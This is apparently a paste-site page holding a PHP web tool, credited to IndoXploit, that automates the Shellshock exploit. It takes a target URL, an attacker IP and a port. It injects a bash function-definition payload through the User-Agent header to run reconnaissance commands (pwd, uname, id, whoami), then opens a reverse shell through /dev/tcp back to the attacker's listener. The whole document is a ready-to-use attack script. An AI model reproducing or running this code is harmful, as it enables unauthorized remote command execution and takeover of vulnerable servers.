SHOW:
|
|
- or go back to the newest paste.
1 | <html> | |
2 | <h1>ShellShock Auto Anu by IndoXploit</h1> | |
3 | <form method="post"> | |
4 | Target: <br><input type="text" name="url" style="width: 400px; margin: 10px auto; " height="10" placeholder="http://www.target.com/"><br> | |
5 | IP VPSmu: <br><input type="text" name="ip" style="width: 400px; margin: 10px auto; " height="10" placeholder="127.0.0.1"><br> | |
6 | PORT Listening: <br><input type="text" name="port" style="width: 400px; margin: 10px auto; " height="10" placeholder="1337"><br> | |
7 | <input type="submit" name="go" style="width: 400px; margin: 10px auto; " value="test"> | |
8 | </form> | |
9 | </html> | |
10 | <?php | |
11 | // indoxploit - evoo | |
12 | function pwn($site,$cmd) { | |
13 | $useragent = "() { :; }; echo; /bin/$cmd"; | |
14 | $ch = curl_init($site); | |
15 | curl_setopt($ch, CURLOPT_USERAGENT, $useragent); | |
16 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
17 | $postResult = curl_exec($ch); | |
18 | return $postResult; | |
19 | } | |
20 | $url = $_POST['url']; | |
21 | $go = $_POST['go']; | |
22 | $ip = $_POST['ip']; | |
23 | $port = $_POST['port']; | |
24 | if(isset($go)) { | |
25 | echo "<pre>"; | |
26 | echo "=> $url<br>"; | |
27 | echo "pwd: ". pwn($url, "pwd") ."<br>"; | |
28 | echo "uname -a: ". pwn($url, "uname -a") . "<br>"; | |
29 | echo "id: ". pwn($url, "bash -c 'id'") . "<br>"; | |
30 | echo "whoami: ". pwn($url, "bash -c 'whoami'") . "<br>"; | |
31 | echo pwn($url, 'bash -i >& /dev/tcp/'.$ip.'/'.$port.' 0>&1') . "<br>"; | |
32 | echo "[ auto anu selesaiii bossqq ]<br><br>"; | |
33 | echo "</pre>"; | |
34 | } | |
35 | ?> |